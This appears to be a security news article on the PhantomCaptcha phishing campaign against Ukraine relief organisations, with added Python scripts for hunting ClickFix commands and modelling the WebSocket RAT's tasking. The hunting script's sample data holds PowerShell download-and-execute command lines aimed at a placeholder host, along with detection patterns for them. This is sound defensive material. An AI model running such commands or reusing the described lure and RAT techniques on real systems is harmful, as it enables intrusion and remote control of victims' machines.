
Cybersecurity researchers have detailed a coordinated spear-phishing campaign called PhantomCaptcha that targets organizations associated with war relief efforts in Ukraine and delivers a remote access Trojan that uses WebSockets for command and control (C2).
The operation, which took place on October 8, 2025, targeted members of the International Committee of the Red Cross, the Norwegian Refugee Council, the United Nations Children’s Fund (UNICEF) office in Ukraine, the Victims Registration Service of the Council of Europe in Ukraine, and local government administrations in Ukraine’s Donetsk, Dnipropetrovsk, Poltava and Mykolaiv regions, SentinelOne said in a report released today.
The phishing email, which impersonated the Office of the President of Ukraine, carried a booby-trapped PDF document containing an embedded link that, when clicked, redirected victims to a fake Zoom site (“zoomconference[.]app”). That site presented a ClickFix-style fake Cloudflare CAPTCHA page, dressed up as a browser check, to trick visitors into running malicious PowerShell commands.

The fake Cloudflare page also acts as a gatekeeper: it opens a WebSocket connection to an attacker-controlled server and sends a JavaScript-generated clientId. If the WebSocket server responds with a matching identifier, the browser redirects the victim to a legitimate, password-protected Zoom meeting.
SentinelOne suspects this branch is reserved for live social-engineering calls with victims, but said it did not observe the threat actors using it during its investigation.
The PowerShell commands pasted into the Windows Run dialog and executed lead to an obfuscated downloader whose main job is to retrieve and execute a second-stage payload from a remote server. That second stage profiles the compromised host, sends the results to the same server, and receives in return a PowerShell remote access Trojan.
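Because ClickFix lures depend on the victim pasting a command into the Run dialog, the dialog’s own history (the RunMRU registry key) is a cheap place to hunt for this stage. The following Python script is an added example, not SentinelOne tooling and not code from the campaign: it walks a constructed RunMRU export, decodes any -EncodedCommand payload, and flags entries that launch a script host with download or evasion switches. The sample command lines are illustrative stand-ins, not the actual PhantomCaptcha stager.

```python
"""Hunt for ClickFix-style commands in the Windows Run dialog history.

Added example, not SentinelOne tooling and not PhantomCaptcha code. Windows
records what is typed into the Run dialog under
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU: "MRUList"
gives the order (most recent first) and each lettered value holds the typed
command followed by a literal "\\1". The export below is constructed for this
example; its command lines are illustrative, not real PhantomCaptcha stagers.
"""
import base64
import re


def _encode_ps(command: str) -> str:
    """Build a PowerShell -EncodedCommand argument (UTF-16LE text, Base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed RunMRU export: value name -> data, as a forensic tool would dump it.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "powershell -w hidden -nop -c \"iex (iwr 'http://example.invalid/c')\"\\1",
    "c": "powershell -ep bypass -enc "
         + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")
         + "\\1",
}

MRU_SUFFIX = "\\1"
# Script hosts worth looking at, with or without a path and .exe suffix.
LAUNCHER_RE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?(powershell|pwsh|mshta|cmd)(?:\.exe)?"?(?=\s|$)', re.I)
ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# (pattern, label) pairs; matched against the command plus any decoded -enc payload.
SUSPICIOUS = [
    (r"\b(iex|invoke-expression)\b", "inline expression execution"),
    (r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient)\b", "remote download"),
    (r"-(w|win|windowstyle)\s+h", "hidden window"),
    (r"-(nop|noprofile)\b", "profile bypass"),
    (r"-(ep|executionpolicy)\s+bypass\b", "execution policy bypass"),
]


def runmru_entries(export: dict) -> list:
    """Return (value_name, command) pairs in MRUList order, most recent first."""
    entries = []
    for name in export.get("MRUList", ""):
        data = export.get(name)
        if data is None:
            continue
        if data.endswith(MRU_SUFFIX):
            data = data[: -len(MRU_SUFFIX)]
        entries.append((name, data))
    return entries


def decode_encoded_command(command: str):
    """Return the UTF-16LE text behind -enc/-EncodedCommand, or None."""
    match = ENC_RE.search(command)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(command: str) -> dict:
    """Classify one Run-dialog command line."""
    decoded = decode_encoded_command(command)
    text = command if decoded is None else f"{command} {decoded}"
    indicators = [label for pattern, label in SUSPICIOUS if re.search(pattern, text, re.I)]
    if decoded is not None:
        indicators.append("encoded command")
    launcher = LAUNCHER_RE.match(command)
    return {
        "launcher": launcher.group(1).lower() if launcher else None,
        "decoded": decoded,
        "indicators": indicators,
    }


def hunt(export: dict) -> list:
    """Flag entries that launch a script host and carry at least one indicator."""
    findings = []
    for name, command in runmru_entries(export):
        result = analyze(command)
        if result["launcher"] and result["indicators"]:
            findings.append({"value": name, "command": command, **result})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_RUNMRU):
        print(f"{finding['value']}: {finding['launcher']} -> {', '.join(finding['indicators'])}")
        if finding["decoded"]:
            print("   decoded:", finding["decoded"])
```

On a live host the same logic applies to a RunMRU export from a forensic image or from Sysmon/EDR telemetry for explorer.exe spawning powershell.exe; the value of checking RunMRU specifically is that it survives even when the PowerShell process and its network activity were never logged.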
“The final payload is a WebSocket RAT hosted on Russian-owned infrastructure that allows arbitrary remote command execution, data exfiltration, and additional malware deployment,” security researcher Tom Hegel said in a statement. “WebSocket-based RATs are remote command execution backdoors, effectively remote shells that give operators arbitrary access to the host.”

The malware connects to a remote WebSocket server at “wss://bsnowcommunications[.]com:80” and is configured to receive Base64-encoded JSON messages containing either a command to be executed with Invoke-Expression or a PowerShell payload. The results of the execution are packaged into a JSON string and sent back to the server over the same WebSocket.
Further analysis of VirusTotal submissions revealed that the eight-page weaponized PDF was uploaded from multiple countries, including Ukraine, India, Italy, and Slovakia, suggesting a broad set of targets.
SentinelOne noted that preparations for the campaign began on March 27, 2025, when the attackers registered the domain “goodhillsenterprise[.]com”, which is used to serve the obfuscated PowerShell scripts. Interestingly, the infrastructure associated with “zoomconference[.]app” was active for only one day, October 8.
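To make the tasking loop concrete, here is an added Python model of the exchange the article describes, written for this page and not taken from SentinelOne’s report or the malware. The text states only that tasks arrive as Base64-wrapped JSON carrying a command for Invoke-Expression and that results return as JSON; the field names (“id”, “type”, “cmd”, “status”, “out”), the simulated host answers and the captured frames are assumptions constructed for the example. Nothing is executed: the implant side is replaced with a lookup table so the format can be parsed and triaged offline. The last helper also encodes the practitioner’s caveat about the C2 URL itself: wss:// (TLS) on port 80 is an unusual pairing that is worth flagging in proxy or flow logs.

```python
"""Model of the WebSocket RAT tasking format described above.

Added example, not SentinelOne's code and not the malware itself. The page
states only that tasks arrive as Base64-encoded JSON carrying a command for
Invoke-Expression or a PowerShell payload, and that results go back as JSON.
The field names ("id", "type", "cmd", "status", "out"), the sample host
answers and the captured frames are assumptions constructed for this example.
Nothing here executes commands: the implant side is simulated with a lookup
table so the exchange can be studied offline.
"""
import base64
import json
from urllib.parse import urlsplit

REQUIRED_FIELDS = ("id", "type", "cmd")


def encode_task(task_id: int, command: str, kind: str = "cmd") -> str:
    """Operator side: JSON task, then Base64, as the text frame sent to the RAT."""
    payload = {"id": task_id, "type": kind, "cmd": command}
    return base64.b64encode(json.dumps(payload).encode("utf-8")).decode("ascii")


def decode_task(frame_text: str) -> dict:
    """Implant/analyst side: unwrap one frame; raise ValueError if it is not a task."""
    try:
        raw = base64.b64decode(frame_text, validate=True)
        task = json.loads(raw.decode("utf-8"))
    except ValueError as exc:  # binascii.Error, UnicodeDecodeError, JSONDecodeError
        raise ValueError(f"not a Base64-wrapped JSON task: {exc}") from exc
    if not isinstance(task, dict):
        raise ValueError("task is not a JSON object")
    missing = [key for key in REQUIRED_FIELDS if key not in task]
    if missing:
        raise ValueError(f"task missing fields {missing}")
    return task


# Constructed stand-in for the compromised host; replaces Invoke-Expression.
SIMULATED_HOST = {
    "whoami": "corp\\analyst",
    "hostname": "WS-0042",
}


def run_task_simulated(task: dict) -> dict:
    """Implant side: produce the result object that would be JSON-encoded and sent back."""
    out = SIMULATED_HOST.get(task["cmd"])
    if out is None:
        return {"id": task["id"], "status": "error", "out": f"unknown command {task['cmd']!r}"}
    return {"id": task["id"], "status": "ok", "out": out}


def encode_result(result: dict) -> str:
    """Pack a result as the compact JSON string the RAT would send over the socket."""
    return json.dumps(result, separators=(",", ":"))


def triage_frames(frames: list) -> list:
    """Analyst helper: walk captured WebSocket text frames, keep those that parse as tasks."""
    found = []
    for index, frame in enumerate(frames):
        try:
            found.append((index, decode_task(frame)))
        except ValueError:
            continue
    return found


def is_anomalous_ws_url(url: str) -> bool:
    """True when scheme and port disagree (wss on 80 or ws on 443), as in the C2 URL above.

    Accepts defanged hosts written with "[.]" so indicators can be pasted as published.
    """
    parts = urlsplit(url.replace("[.]", "."))
    return (parts.scheme, parts.port) in {("wss", 80), ("ws", 443)}


# Constructed capture: a keep-alive, an unrelated Base64 blob, and one real task frame.
SAMPLE_FRAMES = ["ping", "aGVsbG8=", encode_task(7, "hostname")]

if __name__ == "__main__":
    for index, task in triage_frames(SAMPLE_FRAMES):
        result = run_task_simulated(task)
        print(f"frame {index}: task {task} -> {encode_result(result)}")
    print("wss on port 80 anomalous:", is_anomalous_ws_url("wss://bsnowcommunications[.]com:80"))
```

Two design points carry over to real triage: decode_task rejects anything that is not a JSON object with the expected keys, so keep-alives and unrelated Base64 blobs in a capture are skipped rather than misclassified, and the port/scheme check is cheap enough to run across all WebSocket URLs in proxy logs, not only against this campaign’s domain.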

This points to “sophisticated planning and a strong commitment to operational security,” the company said, adding that it also discovered a fake application hosted on the domain “princess-mens[.]click” that aims to collect location information, contacts, call logs, media files, device information, the list of installed apps, and other data from compromised Android devices.
Although the campaign has not been attributed to any known threat actor or group, its use of ClickFix overlaps with attacks recently disclosed as the work of the Russia-linked COLDRIVER hacking group.
“The PhantomCaptcha campaign reflects a highly capable adversary demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control,” SentinelOne said.
“The six-month period from initial infrastructure registration to attack execution, followed by rapid removal of user-facing domains while maintaining backend command and control, confirms the operators’ mastery of both offensive techniques and defensive evasion.”